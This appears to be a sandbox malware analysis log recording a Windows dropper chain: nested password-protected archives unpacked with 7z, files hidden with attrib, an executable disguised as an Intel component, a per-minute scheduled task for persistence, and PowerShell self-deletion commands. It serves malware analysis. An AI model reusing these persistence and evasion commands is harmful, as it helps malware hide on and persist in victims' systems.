Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +H "in.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\attrib.exe attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\attrib.exe attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Windows\System32\attrib.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
Source: C:\Windows\System32\attrib.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe "C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe "C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe "C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe "C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe "C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe "C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe "C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe "C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe "C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mode.com mode 65,10	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +H "in.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\attrib.exe attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\attrib.exe attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\mode.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\mode.com	Section loaded: ureg.dll	Jump to behavior
Source: C:\Windows\System32\mode.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Section loaded: apphelp.dll
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptbase.dll
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe	Section loaded: mswsock.dll
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe	Section loaded: napinsp.dll
Source: C:\Windows\explorer.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\explorer.exe	Section loaded: wshbth.dll
Source: C:\Windows\explorer.exe	Section loaded: nlaapi.dll
Source: C:\Windows\explorer.exe	Section loaded: winrnr.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: explorerframe.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Section loaded: apphelp.dll
